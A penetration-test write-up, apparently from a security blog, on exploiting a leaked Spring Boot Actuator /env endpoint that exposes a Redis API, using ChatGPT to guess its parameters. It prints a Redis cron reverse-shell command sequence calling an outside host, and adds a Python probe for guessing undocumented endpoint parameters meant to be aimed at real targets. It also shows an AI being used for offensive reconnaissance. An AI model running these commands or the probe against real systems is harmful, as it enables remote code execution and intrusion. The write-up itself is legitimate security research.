Article 61: Using ChatGPT to guess the implementation and submitted parameters of an unknown API interface | Further exploitation of API interfaces


 Part1 Preface 

Hello everyone, I am ABC_123, and the official account has been officially renamed "Xitan Laboratory". I had a large glass of Qingdao draft beer tonight and was in a good mood. After I got back, I discussed with a colleague how to exploit Spring Boot's Actuator information leakage vulnerability. Although we did not get a shell in the end, there were still some useful insights, so I have written up this real penetration test case to share with everyone.

In penetration tests and red team engagements we regularly run into Spring Boot Actuator information leakage. We find the /actuator/env endpoint, but there is no /refresh endpoint, no /heapdump file, no /jolokia/list, no /httptrace endpoint, and so on. At that point there seems to be nothing further to do, and it is tempting to give up. However, /env leaks a lot of API paths and other sensitive information. When we come across such an API path we usually do not know which parameters it takes or what unknown function it implements. So ABC_123 thought of using ChatGPT to help guess the implementation and the submitted parameters of unknown API endpoints, and it produced real results!


 Part2 Technical Research Process 

  • The /env endpoint reveals APIs for operating Redis

By examining the /actuator/env endpoint, we found a leaked entry: /api/public/test/redis/set": ["post":["tags":[Redis test operation"] . My colleague then wondered whether this interface could be used to get a Redis reverse shell. A good idea, but /actuator/env only reveals that a /redis/set function exists; it says nothing about how the key and value are passed. So the first problem to solve is what the interface for setting a key looks like and which parameters it takes. By hand we could only guess, so this is the point at which to let ChatGPT do the guessing and give it a try.

[Screenshot]

  • ChatGPT's turn to perform

First, ABC_123 asked ChatGPT the following question, to test its understanding of this API endpoint. The result was good: ChatGPT gave an accurate explanation of the function this endpoint implements.

[Screenshot]

Next, I checked my notes and found that the commands for a Redis reverse shell via cron are roughly as follows:

redis-cli -h 192.168.237.135
set x "\n* * * * * bash -i >& /dev/tcp/192.168.237.133/53 0>&1\n"
config set dir /var/spool/cron/
config set dbfilename root
save

The first line connects with redis-cli; the remaining four are typed at the Redis prompt. The key holds a crontab line carrying the reverse shell, CONFIG SET points the RDB dump at /var/spool/cron/root, and SAVE writes the file to disk.

From these commands it is clear that the cron-based reverse shell needs, at a minimum, the ability to set an arbitrary key value, followed by CONFIG SET and SAVE. It also requires that the Redis process itself has permission to write /var/spool/cron/, and the resulting dump file, which is mostly binary with the crontab line embedded, is accepted by crond on CentOS but rejected by cron on Debian-based systems. So ABC_123 asked the second question: ChatGPT should guess how the key-setting function of this API endpoint might be implemented.

[Screenshot]

I sent it to my colleague to test, and submitting the request ChatGPT proposed as a POST succeeded, as shown in the figure below. After setting the key, we read the value back through /redis/get?key=dir; the read-back, rather than the HTTP response to the POST, is what confirms that the request ChatGPT produced was accurate. One has to admire ChatGPT's capability.

[Screenshot]
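The verification step above, as an added example that is not code from the original post: a small Python probe that tries several guessed encodings of the key/value parameters for the set endpoint (the kind of guesses ChatGPT was asked to produce) and confirms each one through the get endpoint instead of trusting the HTTP status code. The two paths are those from the post; the local mock server, the three candidate encodings and the parameter names key and value are constructed assumptions so that the script runs offline. It generalizes the single request shown in the screenshot into a loop over candidates, with a distinct marker value per candidate.

```python
"""Probe an undocumented API endpoint with several candidate parameter
encodings and confirm each guess through a read-back oracle.

Added example, not code from the original post.  The paths come from the
post (/api/public/test/redis/set and /api/public/test/redis/get?key=...);
the mock server and the candidate encodings are constructed assumptions,
not the real application's contract.
"""
import json
import threading
import urllib.error
import urllib.parse
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer

SET_PATH = "/api/public/test/redis/set"
GET_PATH = "/api/public/test/redis/get"


def candidates(key, value):
    """Guessed request shapes for the set operation.  Each carries its own
    marker value so the read-back identifies which shape actually wrote."""
    return [
        ("json", {"Content-Type": "application/json"},
         json.dumps({"key": key, "value": value + "-json"}).encode(), None),
        ("query", {}, None, {"key": key, "value": value + "-query"}),
        ("form", {"Content-Type": "application/x-www-form-urlencoded"},
         urllib.parse.urlencode({"key": key, "value": value + "-form"}).encode(), None),
    ]


def post(base, path, headers, body, query):
    """Send one POST; return (status, text) without treating 4xx/5xx as fatal."""
    url = base + path + ("?" + urllib.parse.urlencode(query) if query else "")
    req = urllib.request.Request(url, data=body, headers=headers, method="POST")
    try:
        with urllib.request.urlopen(req, timeout=5) as resp:
            return resp.status, resp.read().decode()
    except urllib.error.HTTPError as err:
        return err.code, err.read().decode()


def readback(base, key):
    """Oracle: read the key back through the get endpoint named in the post."""
    url = base + GET_PATH + "?" + urllib.parse.urlencode({"key": key})
    with urllib.request.urlopen(url, timeout=5) as resp:
        return resp.read().decode()


def find_working_encoding(base, key="probe"):
    """Return the first encoding whose marker value is visible via read-back,
    or None.  The POST status is deliberately ignored: a 200 with a silently
    dropped body is common in Spring controllers."""
    for name, headers, body, query in candidates(key, "v1"):
        post(base, SET_PATH, headers, body, query)
        if readback(base, key) == "v1-" + name:
            return name
    return None


class MockRedisApi(BaseHTTPRequestHandler):
    """Constructed stand-in for the target: accepts key/value as
    @RequestParam-style query or form fields and silently ignores JSON."""
    store = {}

    def log_message(self, *args):
        pass

    def _send(self, code, text):
        data = text.encode()
        self.send_response(code)
        self.send_header("Content-Type", "text/plain")
        self.send_header("Content-Length", str(len(data)))
        self.end_headers()
        self.wfile.write(data)

    def do_POST(self):
        parsed = urllib.parse.urlsplit(self.path)
        body = self.rfile.read(int(self.headers.get("Content-Length", 0)))
        params = urllib.parse.parse_qs(parsed.query)
        if self.headers.get("Content-Type", "").startswith("application/x-www-form-urlencoded"):
            params.update(urllib.parse.parse_qs(body.decode()))
        if parsed.path == SET_PATH and "key" in params and "value" in params:
            self.store[params["key"][0]] = params["value"][0]
        self._send(200, "ok")  # 200 even when a JSON body was ignored

    def do_GET(self):
        parsed = urllib.parse.urlsplit(self.path)
        if parsed.path != GET_PATH:
            return self._send(404, "not found")
        key = urllib.parse.parse_qs(parsed.query).get("key", [""])[0]
        self._send(200, self.store.get(key, "null"))


def start_mock():
    """Start the constructed mock on a random loopback port; return (server, base URL)."""
    srv = HTTPServer(("127.0.0.1", 0), MockRedisApi)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv, "http://127.0.0.1:%d" % srv.server_address[1]


if __name__ == "__main__":
    srv, base = start_mock()
    print("working encoding:", find_working_encoding(base))
    srv.shutdown()
```

To use it against a real target, point base at the host and drop the mock. Because each candidate writes a distinct marker, the read-back tells you which encoding the controller honoured even when every POST answers 200, which is exactly the situation in which the status code alone would mislead.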

At this point I realised that to complete the exploitation we were still missing Redis's save function.

[Screenshot]

Next, we asked ChatGPT to guess a possible implementation of the save function for this Redis interface. Unfortunately, it did not work.

[Screenshot]

So ABC_123 asked ChatGPT for several other possible interface implementations of the save function. As shown in the figure below, ChatGPT gave six possible implementations.

[Screenshot]

Unfortunately, none of the save interfaces ChatGPT proposed worked when tested.

[Screenshot]

In the end we concluded that the Redis operation interface probably does not implement Redis's save function at all. But ABC_123 still considers the approach a good one: when you encounter the /actuator/env endpoint or some other API endpoint and do not know how to submit parameters, let ChatGPT help you guess. ABC_123 expects this to be very useful in future.

So ChatGPT got one more chance, and ABC_123 asked another question:

[Screenshot]

As you can see, ChatGPT took /test/redis/get?key=dir as a reference and guessed the implementation of many other API functions, which we can then test one by one. ChatGPT can save a lot of mental and physical effort.

 Part3 Summary 

1.    Although the reverse shell through the Redis API did not succeed in the end, ABC_123 thinks this idea is worth practising. At the very least we found an exploitable high-risk vulnerability: being able to set, modify and delete keys in the application's Redis database is serious in itself.

2.    In penetration testing and red team engagements, it still pays to keep up with the latest technology; using your head more yields unexpected gains.

3.    ChatGPT has many other uses in daily security work. ABC_123 will summarise them in a follow-up article.


Contact me: 0day123abc#gmail.com (replace # with @)


Origin: blog.csdn.net/m0_71692682/article/details/130550778